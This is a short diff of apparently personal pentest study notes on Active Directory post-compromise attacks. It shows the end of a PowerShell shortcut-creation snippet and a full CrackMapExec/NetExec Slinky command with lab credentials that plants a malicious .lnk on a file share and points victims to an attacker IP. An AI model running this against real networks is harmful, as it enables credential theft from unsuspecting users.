Ju-On/Offensive-Security/Attacking AD 3: Post Compromise Attacks.md

         $lnk.HotKey = "Ctrl+Alt+T"
         $lnk.Save()

-crackmapexec / netexec using module -M Slinky, to implant a lnk into a 'file share' on the network if there is one identified and also exposed.
-Without the requirement to access the target machine your self.
+**crackmapexec / netexec using module -M Slinky, to implant a lnk into a 'file share' on the network if there is one identified and also exposed, without the requirement to access the target machine your self.**

     crackmapexec smb <target IP> -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=<attacker IP>